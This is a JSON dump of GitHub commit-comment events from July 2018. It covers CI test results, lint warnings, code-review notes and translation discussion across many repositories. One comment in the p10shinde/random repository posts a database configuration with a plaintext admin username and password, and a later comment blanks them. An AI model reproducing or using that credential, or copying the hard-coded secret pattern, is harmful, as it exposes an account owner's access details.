{"id":"7907719549","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29569181,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T16:33:01Z","updated_at":"2018-07-02T16:33:01Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: OK (2801 of 2925 tests passed, 40 test warnings)\n\nMessages:\n\n * 10 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 115 tests had: ESO small diffs.\n * 99 tests had: EIO diffs.\n * 99 tests had: MTR small diffs.\n * 2 tests had: ESO big diffs.\n * 5 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 499\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.76%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T16:33:01Z"}
{"id":"7907721491","type":"CommitCommentEvent","actor":{"login":"F43nd1r"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29569186,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-02T16:33:23Z","updated_at":"2018-07-02T16:33:23Z","author_association":"CONTRIBUTOR","body":"Good to know that both currently supported versions are doing fine in production apps (which aren't my own).\r\n\r\nI see you were upgrading from a version which was released before I joined the project. Did you need any information, which was missing/hidden in the wiki?\r\n\r\n(for future reference, related PR is https://github.com/ankidroid/Anki-Android/pull/4893)\r\n\r\n"}},"created_at":"2018-07-02T16:33:23Z"}
{"id":"7907723253","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29569189,"position":275,"line":null,"path":"app/src/at-thachnguyen/res/layout/activity_main2.xml","commit_id":"c2738df6450cb7b12f6c3fd97bd091c6df8fd81b","created_at":"2018-07-02T16:33:43Z","updated_at":"2018-07-02T16:33:43Z","author_association":"NONE","body":"WARNING: [ObsoleteLayoutParam] Invalid layout param in a `RelativeLayout`: `layout_weight`\n The given layout_param is not defined for the given layout, meaning it has no effect. This usually happens when you change the parent layout or move view code around without updating the layout params. This will cause useless attribute processing at runtime, and is misleading for others reading the layout so the parameter should be removed."}},"created_at":"2018-07-02T16:33:43Z"}
{"id":"7907723296","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29569190,"position":296,"line":null,"path":"app/src/at-thachnguyen/res/layout/activity_main2.xml","commit_id":"c2738df6450cb7b12f6c3fd97bd091c6df8fd81b","created_at":"2018-07-02T16:33:43Z","updated_at":"2018-07-02T16:33:43Z","author_association":"NONE","body":"WARNING: [RelativeOverlap] `TextView-5` can overlap `ImageView-3` if @string/good_morning grows due to localized text expansion\n If relative layout has text or button items aligned to left and right sides they can overlap each other due to localized text expansion unless they have mutual constraints like `toEndOf`/`toStartOf`."}},"created_at":"2018-07-02T16:33:43Z"}
{"id":"7907723315","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29569191,"position":329,"line":null,"path":"app/src/at-thachnguyen/res/layout/activity_main2.xml","commit_id":"c2738df6450cb7b12f6c3fd97bd091c6df8fd81b","created_at":"2018-07-02T16:33:44Z","updated_at":"2018-07-02T16:33:44Z","author_association":"NONE","body":"WARNING: [RelativeOverlap] `TextView-11` can overlap `ImageView-13` if @string/february grows due to localized text expansion\n If relative layout has text or button items aligned to left and right sides they can overlap each other due to localized text expansion unless they have mutual constraints like `toEndOf`/`toStartOf`."}},"created_at":"2018-07-02T16:33:44Z"}
{"id":"7907724271","type":"CommitCommentEvent","actor":{"login":"mlbj"},"repo":{"name":"jcert/autocouve"},"payload":{"comment":{"id":29569193,"position":null,"line":null,"path":null,"commit_id":"dc1cb330f9ce891b5ed2c46a6efe9ceeb0f78a4a","created_at":"2018-07-02T16:33:55Z","updated_at":"2018-07-02T16:33:55Z","author_association":"COLLABORATOR","body":"também foi adicionada uma função de inicialização "}},"created_at":"2018-07-02T16:33:55Z"}
{"id":"7907729889","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29569198,"position":null,"line":null,"path":null,"commit_id":"c10dab3e212b8ecce11edaac5bb9e8da05531b93","created_at":"2018-07-02T16:35:02Z","updated_at":"2018-07-02T16:35:02Z","author_association":"OWNER","body":"![item sales summary report](https://user-images.githubusercontent.com/2995044/42175689-f4d96ebc-7e43-11e8-891c-88a5507a7155.png)\r\n"}},"created_at":"2018-07-02T16:35:02Z"}
{"id":"7907730055","type":"CommitCommentEvent","actor":{"login":"jonnymacs"},"repo":{"name":"Yasumoto/aws-sdk-swift-core"},"payload":{"comment":{"id":29569199,"position":null,"line":null,"path":null,"commit_id":"0a9ac538854b260b89c03494a82f11f51b101a5f","created_at":"2018-07-02T16:35:04Z","updated_at":"2018-07-02T16:35:04Z","author_association":"NONE","body":"any luck? btw the spm has `from: 1.5.1` and I refreshed a few weeks ago so the .resolved file has 1.8.0. I will update the main package.swift as well to resolve the confusion."}},"created_at":"2018-07-02T16:35:04Z"}
{"id":"7907731206","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569201,"position":null,"line":null,"path":null,"commit_id":"964e71ebd1db5dd3ae3f51d1cd273f7ce2e4ef29","created_at":"2018-07-02T16:35:18Z","updated_at":"2018-07-02T16:35:18Z","author_association":"COLLABORATOR","body":"Reworked the terms extraction. Unfortunately this old version of libwnck is needed for Xfce's window manager. It's a pitty that popular software like that still depends on ancient stuff, but meh... I'll try to explain why something might be needed in the future, though."}},"created_at":"2018-07-02T16:35:18Z"}
{"id":"7907737136","type":"CommitCommentEvent","actor":{"login":"itz7mada"},"repo":{"name":"itz7mada/my-travel-plans"},"payload":{"comment":{"id":29569209,"position":null,"line":null,"path":null,"commit_id":"cbab7fbc2298d56b93b95dfb7cf37662e60f97d9","created_at":"2018-07-02T16:36:30Z","updated_at":"2018-07-02T16:36:30Z","author_association":"OWNER","body":"add animation\r\n"}},"created_at":"2018-07-02T16:36:30Z"}
{"id":"7907738299","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569213,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T16:36:44Z","updated_at":"2018-07-02T16:36:44Z","author_association":"OWNER","body":"command is here:\r\n\r\nhttps://github.com/jrmarino/Ravenports/blob/54b4a17711b03db76de04959da960765d121e43a/Mk/raven.mk#L428-L442\r\n\r\nShould be easy to duplicate on CLI."}},"created_at":"2018-07-02T16:36:44Z"}
{"id":"7907739797","type":"CommitCommentEvent","actor":{"login":"dinatih"},"repo":{"name":"comfy/comfortable-mexican-sofa"},"payload":{"comment":{"id":29569215,"position":null,"line":null,"path":null,"commit_id":"70011e47674a702d3a3048f8286486e452aa850b","created_at":"2018-07-02T16:37:04Z","updated_at":"2018-07-02T16:37:04Z","author_association":"CONTRIBUTOR","body":"Yes, of course ! Done here https://github.com/comfy/comfy-bootstrap-form/issues/11"}},"created_at":"2018-07-02T16:37:04Z"}
{"id":"7907740513","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29569217,"position":23,"line":379,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T16:37:13Z","updated_at":"2018-07-02T16:37:13Z","author_association":"COLLABORATOR","body":"Так как речь идёт в контексте replay-защиты, то я решил, что \"разделение сети\" подойдёт. Тут ещё я решил важным написать именно про сеть, а не про цепь, так как про сеть будет более понятно обычному пользователю, да и некорректным не является (ведь кто-то протокол хочет поменять, значит)"}},"created_at":"2018-07-02T16:37:13Z"}
{"id":"7907740943","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29569219,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/functions/enumValuesValueOf.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T16:37:19Z","updated_at":"2018-07-02T16:37:19Z","author_association":"MEMBER","body":"Also, it's not possible to test `MutableList::removeAt` because of https://youtrack.jetbrains.com/issue/KT-11754 :("}},"created_at":"2018-07-02T16:37:19Z"}
{"id":"7907744775","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29569231,"position":19,"line":375,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T16:38:08Z","updated_at":"2018-07-02T16:38:08Z","author_association":"COLLABORATOR","body":"Я решил везде поменять на replay-атаку просто. Благо, что такое replay все и так себе представляют примерно"}},"created_at":"2018-07-02T16:38:08Z"}
{"id":"7907747167","type":"CommitCommentEvent","actor":{"login":"vaishnavthej"},"repo":{"name":"vaishnavthej/100sSinglePage"},"payload":{"comment":{"id":29569239,"position":null,"line":null,"path":null,"commit_id":"5b08ed0e190106ea3d402ad8b7ca89fa50a921c1","created_at":"2018-07-02T16:38:37Z","updated_at":"2018-07-02T16:38:37Z","author_association":"OWNER","body":"rolled back"}},"created_at":"2018-07-02T16:38:37Z"}
{"id":"7907747531","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29569240,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T16:38:42Z","updated_at":"2018-07-02T16:38:42Z","author_association":"COLLABORATOR","body":"this isn't going to work correctly if `CHROME_CONFIG_HOME` is set"}},"created_at":"2018-07-02T16:38:42Z"}
{"id":"7907752428","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29569250,"position":null,"line":null,"path":null,"commit_id":"b70f3bbb1e6157e73ce27f73905f3b11bb9c0dbf","created_at":"2018-07-02T16:39:48Z","updated_at":"2018-07-02T16:39:48Z","author_association":"OWNER","body":"![items sales type summary report](https://user-images.githubusercontent.com/2995044/42175864-9ffe1f7c-7e44-11e8-95d2-cee89cece637.png)\r\n"}},"created_at":"2018-07-02T16:39:48Z"}
{"id":"7907754023","type":"CommitCommentEvent","actor":{"login":"ccbi-github"},"repo":{"name":"ccbi-github/wms"},"payload":{"comment":{"id":29569252,"position":null,"line":null,"path":null,"commit_id":"ba36ba32fa6d97b3e2f05e8ddf4cdf3cddaa787b","created_at":"2018-07-02T16:40:09Z","updated_at":"2018-07-02T16:40:09Z","author_association":"OWNER","body":"测试"}},"created_at":"2018-07-02T16:40:09Z"}
{"id":"7907758475","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29569261,"position":5,"line":6600,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"12d639fe332954cdac907eef1bb391b13ab95060","created_at":"2018-07-02T16:41:08Z","updated_at":"2018-07-02T16:41:08Z","author_association":"COLLABORATOR","body":"Good to have both but I hope we can disambiguate well enough. We should\nwork on tagging a small corpus for this soon.\n\n\n\nOn Mon, Jul 2, 2018, 7:29 PM koguzhan <notifications@github.com> wrote:\n\n> Yes. Do you think that should be seperated from the other sense of gir?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/12d639fe332954cdac907eef1bb391b13ab95060#commitcomment-29569122>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2kX5yPtB1rEg0bgmqYeWy06Jal-Qks5uCkpLgaJpZM4U_fuw>\n> .\n>\n"}},"created_at":"2018-07-02T16:41:08Z"}
{"id":"7907759200","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569263,"position":null,"line":null,"path":null,"commit_id":"964e71ebd1db5dd3ae3f51d1cd273f7ce2e4ef29","created_at":"2018-07-02T16:41:17Z","updated_at":"2018-07-02T16:41:17Z","author_association":"OWNER","body":"Well, I asked in another comment: Are you sure?\r\nMeaning, are you sure this library is explicitly not backwards compatible?\r\nDid you read something that explicitly states that?  That's really bad design for libraries."}},"created_at":"2018-07-02T16:41:17Z"}
{"id":"7907759913","type":"CommitCommentEvent","actor":{"login":"ceefit"},"repo":{"name":"AnthonyMaz/wikiLearn"},"payload":{"comment":{"id":29569265,"position":43,"line":124,"path":"wiki-learn/__main__.py","commit_id":"2bb2c65621695c7656890ec1a1064a55b7856f9d","created_at":"2018-07-02T16:41:26Z","updated_at":"2018-07-02T16:41:26Z","author_association":"COLLABORATOR","body":"This needs to eventually go. It fixes the flickering while it's up, but this isn't the right way to handle it."}},"created_at":"2018-07-02T16:41:26Z"}
{"id":"7907760474","type":"CommitCommentEvent","actor":{"login":"hkaiser"},"repo":{"name":"STEllAR-GROUP/hpx"},"payload":{"comment":{"id":29569266,"position":44,"line":191,"path":"hpx/plugins/parcelport/tcp/sender.hpp","commit_id":"0d9a4253683b708936e09551477b5a30b7a6fa5e","created_at":"2018-07-02T16:41:33Z","updated_at":"2018-07-02T16:41:33Z","author_association":"MEMBER","body":"This is guaranteed to run on the pp thread. But we need to check whether the thread manager is already running (see next commit)..."}},"created_at":"2018-07-02T16:41:33Z"}
{"id":"7907762244","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29569270,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T16:41:55Z","updated_at":"2018-07-02T16:41:55Z","author_association":"COLLABORATOR","body":"as suggested https://github.com/brave/brave-core/pull/213 we should be using a method override instead of a patch. That will remove the `CHROME_CONFIG_HOME` issue"}},"created_at":"2018-07-02T16:41:55Z"}
{"id":"7907764155","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569274,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T16:42:20Z","updated_at":"2018-07-02T16:42:20Z","author_association":"OWNER","body":"I'm not sure why that link didn't show as formatted code.  annoying."}},"created_at":"2018-07-02T16:42:20Z"}
{"id":"7907768105","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29569285,"position":null,"line":null,"path":null,"commit_id":"07a932c5efdac16a7d3d14a007007a2eb9ca8968","created_at":"2018-07-02T16:43:07Z","updated_at":"2018-07-02T16:43:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-381](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-381).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-381-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T16:43:07Z"}
{"id":"7907774386","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29569294,"position":5,"line":6600,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"12d639fe332954cdac907eef1bb391b13ab95060","created_at":"2018-07-02T16:44:25Z","updated_at":"2018-07-02T16:44:25Z","author_association":"COLLABORATOR","body":"Hmm, does this really need disambiguation? Or do you mean for purposes other than uig-tur translation?"}},"created_at":"2018-07-02T16:44:25Z"}
{"id":"7907776016","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569297,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T16:44:47Z","updated_at":"2018-07-02T16:44:47Z","author_association":"COLLABORATOR","body":"Thanks, will try it out."}},"created_at":"2018-07-02T16:44:47Z"}
{"id":"7907777191","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"austingorman/jsModules"},"payload":{"comment":{"id":29569300,"position":null,"line":null,"path":null,"commit_id":"9e235d403a6a1aa82829f5d14b3ca063ca79bdd8","created_at":"2018-07-02T16:45:03Z","updated_at":"2018-07-02T16:45:03Z","author_association":"NONE","body":"On line 7 of your index.html you don't need `../` there... it'll work if you take out just one of the dots, because you are using the copied over index file along with the copied over css folders thanks to grunnnnnnt. 💯 "}},"created_at":"2018-07-02T16:45:03Z"}
{"id":"7907779162","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569312,"position":null,"line":null,"path":null,"commit_id":"964e71ebd1db5dd3ae3f51d1cd273f7ce2e4ef29","created_at":"2018-07-02T16:45:28Z","updated_at":"2018-07-02T16:45:28Z","author_association":"COLLABORATOR","body":"I'll answer that in the other comment."}},"created_at":"2018-07-02T16:45:28Z"}
{"id":"7907779211","type":"CommitCommentEvent","actor":{"login":"p10shinde"},"repo":{"name":"p10shinde/random"},"payload":{"comment":{"id":29569313,"position":null,"line":null,"path":null,"commit_id":"3bb7ee5092fea7a1e5048563fc2a095dfeed9651","created_at":"2018-07-02T16:45:29Z","updated_at":"2018-07-02T16:45:29Z","author_association":"OWNER","body":"global.doDB = {\r\n    user: 'apiAdmin', pass: encodeURIComponent('apiadm!n$(full)'),  host: 'localhost',  port: 27017, database: 'doDashboard',\r\n    autoBackup: true, removeOldBackup: false, keepLastDaysBackup: 2, autoBackupPath: '' // i.e. /var/database-backup/\r\n};"}},"created_at":"2018-07-02T16:45:29Z"}
{"id":"7907780835","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29569323,"position":5,"line":6600,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"12d639fe332954cdac907eef1bb391b13ab95060","created_at":"2018-07-02T16:45:49Z","updated_at":"2018-07-02T16:45:49Z","author_association":"COLLABORATOR","body":"Yeah both translation and use of the analyzer in general. This is not a\npriority at the moment though.\n\nOn Mon, Jul 2, 2018, 7:44 PM koguzhan <notifications@github.com> wrote:\n\n> Hmm, does this really need disambiguation? Or do you mean for purposes\n> other than uig-tur translation?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/12d639fe332954cdac907eef1bb391b13ab95060#commitcomment-29569294>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2sd-5qmsRidlv6nzkY7baQW-dqigks5uCk3pgaJpZM4U_fuw>\n> .\n>\n"}},"created_at":"2018-07-02T16:45:49Z"}
{"id":"7907781674","type":"CommitCommentEvent","actor":{"login":"else"},"repo":{"name":"roman5364/sass"},"payload":{"comment":{"id":29569328,"position":null,"line":null,"path":null,"commit_id":"44c9d2b3e54712f55218a013c4681be2d6018330","created_at":"2018-07-02T16:46:01Z","updated_at":"2018-07-02T16:46:01Z","author_association":"NONE","body":"Please don't mention random people."}},"created_at":"2018-07-02T16:46:01Z"}
{"id":"7907784643","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29569333,"position":null,"line":null,"path":null,"commit_id":"fb3bd846734a3967bb554f9453ad8c5817bf395c","created_at":"2018-07-02T16:46:41Z","updated_at":"2018-07-02T16:46:41Z","author_association":"CONTRIBUTOR","body":"wrong commit title must be ```s/backup/backport``` ;-)"}},"created_at":"2018-07-02T16:46:41Z"}
{"id":"7907787312","type":"CommitCommentEvent","actor":{"login":"vzorglub"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":29569340,"position":169,"line":131,"path":"docs/documentation/concepts/units-of-measurement.md","commit_id":"7c3a53c83e11d50ee88afe86a16333e5d6b8713d","created_at":"2018-07-02T16:47:17Z","updated_at":"2018-07-02T16:47:17Z","author_association":"CONTRIBUTOR","body":"SI is metre. I'll correct Celsius when I get home.\n\nOn Mon, 2 Jul 2018, 15:53 Wouter Born, <notifications@github.com> wrote:\n\n> Celsius\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/eclipse/smarthome/commit/7c3a53c83e11d50ee88afe86a16333e5d6b8713d#commitcomment-29567861>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASmb4PBgO9XP8dHy2TBML-HKtAhVSGiNks5uCjPmgaJpZM4U_dUc>\n> .\n>\n"}},"created_at":"2018-07-02T16:47:17Z"}
{"id":"7907788872","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29569342,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T16:47:35Z","updated_at":"2018-07-02T16:47:35Z","author_association":"CONTRIBUTOR","body":"@isonil in `#addclosetag` What should be indicated?\r\n\r\n"}},"created_at":"2018-07-02T16:47:35Z"}
{"id":"7907789043","type":"CommitCommentEvent","actor":{"login":"shreyasminocha"},"repo":{"name":"59naga/babel-plugin-add-module-exports"},"payload":{"comment":{"id":29569345,"position":null,"line":null,"path":null,"commit_id":"aa1afb05937ba81c63108f985e70d5366cc0e5b2","created_at":"2018-07-02T16:47:37Z","updated_at":"2018-07-02T16:47:37Z","author_association":"NONE","body":":tada:"}},"created_at":"2018-07-02T16:47:37Z"}
{"id":"7907793394","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"yrodiere/hibernate-orm"},"payload":{"comment":{"id":29569351,"position":46,"line":86,"path":"hibernate-core/src/main/java/org/hibernate/loader/plan/exec/internal/LoadQueryJoinAndFetchProcessor.java","commit_id":"9d5f222f8275dabac2c17399d7d263f2a5120b92","created_at":"2018-07-02T16:48:34Z","updated_at":"2018-07-02T16:48:34Z","author_association":"NONE","body":"@yrodiere I'm thinking about merging this one too in the end. Is there a reason why you used two references instead of having a simple boolean `contributeAliases`? I think that would be simpler?"}},"created_at":"2018-07-02T16:48:34Z"}
{"id":"7907793433","type":"CommitCommentEvent","actor":{"login":"lukechampine"},"repo":{"name":"NebulousLabs/Sia"},"payload":{"comment":{"id":29569352,"position":140,"line":628,"path":"cmd/siac/rentercmd.go","commit_id":"c482386129e18ca9ef6dae71fd1f8372d04e1c37","created_at":"2018-07-02T16:48:34Z","updated_at":"2018-07-02T16:48:34Z","author_association":"MEMBER","body":"typically this is written as `panic(\"unreachable\")` (no `return` necessary)"}},"created_at":"2018-07-02T16:48:34Z"}
{"id":"7907798115","type":"CommitCommentEvent","actor":{"login":"else"},"repo":{"name":"Madhackers21/OrderingRegistratorV3"},"payload":{"comment":{"id":29569364,"position":null,"line":null,"path":null,"commit_id":"961194a93a3f7ff526bf5f804de6910e2d7502a5","created_at":"2018-07-02T16:49:36Z","updated_at":"2018-07-02T16:49:36Z","author_association":"NONE","body":"Please don't highlight me :("}},"created_at":"2018-07-02T16:49:36Z"}
{"id":"7907809063","type":"CommitCommentEvent","actor":{"login":"lukechampine"},"repo":{"name":"NebulousLabs/Sia"},"payload":{"comment":{"id":29569385,"position":112,"line":605,"path":"cmd/siac/rentercmd.go","commit_id":"c482386129e18ca9ef6dae71fd1f8372d04e1c37","created_at":"2018-07-02T16:52:01Z","updated_at":"2018-07-02T16:52:01Z","author_association":"MEMBER","body":"we give up after a certain number of `tries`, but each try takes `OutputRefreshRate`. If we change `OutputRefreshRate`, we change both the refresh rate and the total time elapsed before giving up. It seems more natural to me that we'd want to give up after a specific duration, not a number of tries."}},"created_at":"2018-07-02T16:52:01Z"}
{"id":"7907812641","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29569388,"position":null,"line":null,"path":null,"commit_id":"ac5e41848cac923cc51089a873dd32a74308d893","created_at":"2018-07-02T16:52:49Z","updated_at":"2018-07-02T16:52:49Z","author_association":"COLLABORATOR","body":"Seems OK, thanks for compiling it in the changelog :)\r\nIf I notice something missing on the list or add something new, I will update the changelog."}},"created_at":"2018-07-02T16:52:49Z"}
{"id":"7907817473","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29569393,"position":null,"line":null,"path":null,"commit_id":"a8c65afca15a557bc7c3788ad3cacdfee2d18467","created_at":"2018-07-02T16:53:51Z","updated_at":"2018-07-02T16:53:51Z","author_association":"MEMBER","body":"@mimugmail FYI\r\n\r\nBTW, are we ready to kill os-quagga yet?"}},"created_at":"2018-07-02T16:53:51Z"}
{"id":"7907823939","type":"CommitCommentEvent","actor":{"login":"coll2000"},"repo":{"name":"coll2000/Fisher-Bot"},"payload":{"comment":{"id":29569405,"position":7,"line":7,"path":"README.md","commit_id":"c5bc38262072174f55fb134601c74fbf99d972ce","created_at":"2018-07-02T16:55:16Z","updated_at":"2018-07-02T16:55:16Z","author_association":"OWNER","body":"Currently working on this bug - now drops a fish every time a fish is caught"}},"created_at":"2018-07-02T16:55:16Z"}
{"id":"7907829181","type":"CommitCommentEvent","actor":{"login":"drgrib"},"repo":{"name":"deanishe/awgo"},"payload":{"comment":{"id":29569417,"position":39,"line":58,"path":"README.md","commit_id":"5f0051950af39371385f2dfda96483eb1423e565","created_at":"2018-07-02T16:56:22Z","updated_at":"2018-07-02T16:56:22Z","author_association":"NONE","body":"@deanishe \r\nThis is much better than before since it doesn't panic on import. But it would be even better if it had the form:\r\n\r\n``` go\r\nwf, err := aw.New()\r\n```\r\n\r\nInstead of just panicking and not giving clients an opportunity to handle the error themselves. A common use case would be that I could react to the error and make my program run with a custom `aw.NewFromEnv` call if it detects it is not in an Alfred environment. Also, passing errors through to client calls instead of forcing panics is the standard Go way, as one can see in most standard library functions."}},"created_at":"2018-07-02T16:56:22Z"}
{"id":"7907833225","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569421,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T16:57:13Z","updated_at":"2018-07-02T16:57:13Z","author_association":"COLLABORATOR","body":"Reworked the port (and added a exrun dependency). The transition to gtk3 is painfully slow with Xfce. Yes, libwnck-legacy was ported for xfwm only. Freshports lists just below 60 ports that depend on it, though. Most of that might be old rubbish (according to FP Xfce's panel also needs it, but the newer version that I ported builds against libwnck 3.x). I'll happily retire libwnck-legacy once it's no longer needed. I'm not too much in favor of stuff that's dead for seven years or so now.\r\n\r\nI tried to build this xfwm version against the newer libwnck, however configure failed and told me that the older version is required. Otherwise I wouldn't have added the legacy port."}},"created_at":"2018-07-02T16:57:13Z"}
{"id":"7907834644","type":"CommitCommentEvent","actor":{"login":"aiavenak"},"repo":{"name":"aiavenak/hello-git-world"},"payload":{"comment":{"id":29569425,"position":null,"line":null,"path":null,"commit_id":"9186a80d574d73ebc7082d576257c5fe2a09878e","created_at":"2018-07-02T16:57:31Z","updated_at":"2018-07-02T16:57:31Z","author_association":"OWNER","body":"This looks better. Ready to merge with master!"}},"created_at":"2018-07-02T16:57:31Z"}
{"id":"7907837748","type":"CommitCommentEvent","actor":{"login":"vncoelho"},"repo":{"name":"neo-project/neo"},"payload":{"comment":{"id":29569433,"position":14,"line":88,"path":"neo/Network/P2P/Peer.cs","commit_id":"09878c1f67bab248e1830e8d8dce7ea25bf7df10","created_at":"2018-07-02T16:58:12Z","updated_at":"2018-07-02T16:58:12Z","author_association":"NONE","body":"Is the WS being used now? If yes, will it be an option or we just should set the doors correctly?\r\n\r\nThe seed should keep point to the TCP/IP?"}},"created_at":"2018-07-02T16:58:12Z"}
{"id":"7907841670","type":"CommitCommentEvent","actor":{"login":"p10shinde"},"repo":{"name":"p10shinde/random"},"payload":{"comment":{"id":29569448,"position":null,"line":null,"path":null,"commit_id":"3bb7ee5092fea7a1e5048563fc2a095dfeed9651","created_at":"2018-07-02T16:59:06Z","updated_at":"2018-07-02T16:59:06Z","author_association":"OWNER","body":"global.doDB = {\r\n    user: '', pass: encodeURIComponent(''),  host: 'localhost',  port: 27017, database: 'doDashboard',\r\n    autoBackup: true, removeOldBackup: false, keepLastDaysBackup: 2, autoBackupPath: '' // i.e. /var/database-backup/\r\n};"}},"created_at":"2018-07-02T16:59:06Z"}
